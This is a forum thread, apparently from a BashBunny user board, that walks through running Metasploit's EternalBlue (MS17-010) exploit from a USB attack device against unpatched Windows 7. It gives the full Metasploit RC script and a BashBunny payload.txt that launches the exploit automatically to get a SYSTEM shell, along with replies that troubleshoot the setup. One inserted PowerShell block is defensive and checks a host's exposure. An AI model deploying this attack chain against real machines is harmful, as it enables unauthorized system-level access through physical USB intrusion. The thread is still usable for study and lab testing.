Metasploit, Eternalblue and a Bunny


hanshaze


My latest BashBunny challenge..... MSF - MS17_010 - BashBunny

Thanks to Astr0baby, I am just a sharer of his excellent thoughts

 

Let's go.....

 


Make sure to set some date for TLS/SSL to work ;)
# date -s "20170925"


Add this to /etc/apt/sources.list
deb http://http.us.debian.org/debian/ jessie-updates main

# apt-get update
# apt-get -y install autoconf bison build-essential curl git-core libapr1 libaprutil1 libcurl4-openssl-dev libgmp3-dev
# curl -sSL https://get.rvm.io | bash -s stable
# source /etc/profile.d/rvm.sh
# rvm requirements
# rvm list known
# rvm install 2.4.1
# vi /root/.bashrc
Add at the end
source /etc/profile.d/rvm.sh
rvm use 2.4.1 --default
# mkdir /root/METASPLOIT
# cd /root/METASPLOIT/
# wget https://raw.githubusercontent.com/iam1980/metasploit-vps-installer/master/msf_vps_installer.sh
# chmod +x msf_vps_installer.sh
# ./msf_vps_installer.sh
# git config --global user.name "USER"
# git config --global user.email "user@example.com"
# ./msfupdate

Check /etc/dhcp/dhcpd.conf. It contains the pool

range 172.16.64.10 172.16.64.12;

Set it to only one value so the target always gets the same address:

range 172.16.64.64 172.16.64.64;

Save this to ~/metasploit-framework as cmd.rc

-----
use exploit/windows/smb/ms17_010_eternalblue
set PAYLOAD windows/x64/exec
set RHOST 172.16.64.64
set CMD cmd.exe
exploit

-----
The above is ideal when we want to get a NT AUTHORITY\SYSTEM shell on the target Windows 7 SP1 x64
(unlocked)


If the target is locked we can use another payload such as this one


So RHOST would again be 172.16.64.64 and LHOST 172.16.64.1 … This can be easily scripted via a Metasploit RC
script, so ;)
The Metasploit RC scripts should be placed in /root/metasploit-framework on the BashBunny so we can call them
from the PAYLOAD.TXT for the corresponding attack switch position.
So ideally the payload.txt (switch1 or switch2) would look like this:


#!/bin/bash
LED SETUP
ATTACKMODE RNDIS_ETHERNET
# Set some current time ..... check your watch
date -s "20170523 23:23"
# The payload shell does not read /root/.bashrc, so load rvm here or msfconsole
# will not find the ruby installed above
source /etc/profile.d/rvm.sh
LED ATTACK
# run the RC script saved earlier (cmd.rc) in the background so the payload can finish
/root/metasploit-framework/msfconsole -r /root/metasploit-framework/cmd.rc &
LED FINISH


The target Windows 7 should have an accessible SMB port 445 from the USB network that the BashBunny device
creates.

A default Windows system has the firewall on, so the attack won't work as the port is blocked.

For demonstration purposes we assume there is no firewall on ..
After a while you should get a NT AUTHORITY\SYSTEM cmd shell pop up on your Win 7 desktop :)
 
 

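Seen from the other side of the cable: an added PowerShell check, not from the thread or from Astr0baby's setup, for a Windows 7 SP1 host, reporting whether it is in the state the demo needs, that is unpatched for MS17-010 with SMBv1 enabled and the firewall off. The KB numbers and the SMB1 registry value are Microsoft's documented ones for Windows 7; the function name and output strings are my own, and the netsh text match assumes an English locale.

```powershell
# Added check, not from the thread: confirm a Windows 7 SP1 host is NOT in the
# state the demo above relies on (unpatched for MS17-010, SMBv1 on, firewall off).
# Run from an elevated prompt; PowerShell 2.0 syntax, the Windows 7 default.
# Assumes an English netsh locale for the 'State ON/OFF' text match.

function Test-Ms17010Exposure {
    $findings = @()

    # MS17-010 for Windows 7 SP1 shipped as KB4012212 (security-only) and
    # KB4012215 (monthly rollup). Later rollups supersede both, so a miss here
    # means "check update history", not "exploitable".
    $kbs = @('KB4012212', 'KB4012215')
    $hit = Get-HotFix | Where-Object { $kbs -contains $_.HotFixID }
    if ($hit) { $findings += "PATCH    OK   : $(($hit | ForEach-Object { $_.HotFixID }) -join ',')" }
    else      { $findings += "PATCH    WARN : none of $($kbs -join '/') installed; verify via update history" }

    # EternalBlue needs SMBv1. On Windows 7 the server side is the SMB1 DWORD under
    # LanmanServer\Parameters: 0 = disabled, absent or 1 = enabled.
    $key  = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters'
    $smb1 = (Get-ItemProperty -Path $key -ErrorAction SilentlyContinue).SMB1
    if ($smb1 -eq 0) { $findings += "SMBv1    OK   : disabled" }
    else             { $findings += "SMBv1    WARN : enabled (set SMB1=0 under $key, then reboot)" }

    # The thread notes the stock firewall blocks the attack; confirm every profile is ON.
    $off = netsh advfirewall show allprofiles state | Select-String -Pattern 'State\s+OFF'
    if ($off) { $findings += "FIREWALL WARN : $(@($off).Count) profile(s) OFF" }
    else      { $findings += "FIREWALL OK   : all profiles ON" }

    # SMB always listens on 445; report it so the reader knows only the firewall stands
    # between the USB/RNDIS network and the service.
    $listening = netstat -ano -p tcp | Select-String -Pattern ':445\s+\S+\s+LISTENING'
    if ($listening) { $findings += "PORT 445 INFO : listening on $(@($listening).Count) socket(s)" }

    return $findings
}

Test-Ms17010Exposure | ForEach-Object { Write-Output $_ }
```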


helloooo    I met a problem:      I wrote a payload.txt as you told, but it didn't run metasploit at all.  So I added a "source /etc/profile.d/rvm.sh" to the payload. Msf will run for a moment as follows:

 

root@bunny:~# ps -aux | grep 'metasploit'

root       920 33.4  8.3  57556 42496 ?        Sl   13:18   0:10 ruby /root/metasploit-framework/msfconsole -r /root/metasploit-framework/1.rc
root      1115  0.0  0.1   2072   544 pts/0    S+   13:19   0:00 grep metasploit
root@bunny:~#

But it will stop after that.


root@bunny:~# ps -aux | grep 'metasploit'
root      1220  0.0  0.1   2068   544 pts/0    S+   13:19   0:00 grep metasploit

 

No payload will execute.

I tried to debug it with the command:

ruby /root/metasploit-framework/msfconsole -r /root/metasploit-framework/1.rc  >> /root/udisk/exp/msf.log

But the file is empty.

This command will work if I execute it in the BashBunny SSH.    The payload also worked if I replace it with another command.       So I don't know why it doesn't work.

 

Thanks in advance


I've noticed the last metasploit payload made had an rc file that it executed and ran flawlessly if configured right. Also make sure metasploit is connected to a database, which you can make by downloading the msfdb script from GitHub, give it a quick edit for the bunny and execute. Worked great for me


On 12/26/2017 at 5:23 AM, b0N3z said:

I've noticed the last metasploit payload made had an rc file that it executed and ran flawlessly if configured right. Also make sure metasploit is connected to a database, which you can make by downloading the msfdb script from GitHub, give it a quick edit for the bunny and execute. Worked great for me

I've got this 90% up and running, but can't get metasploit to connect to the postgresql database.

Can you please explain how to do this step in further detail?

Thanks!


Hmm, so I have a thought.  Since this is only for one payload, why not try just using the module for EternalBlue and the user's custom shellcode to execute code?  The Bunny setup would be easier and the spinup would be a lot faster and less extensive for the BashBunny.


On 1/28/2019 at 3:53 PM, thatalbinofrog said:

I've got this 90% up and running, but can't get metasploit to connect to the postgresql database.

Can you please explain how to do this step in further detail?

Thanks!

sudo /etc/init.d/postgresql start && sudo msfdb init

# or

sudo systemctl daemon-reload && sudo pg_ctlcluster 12 main start

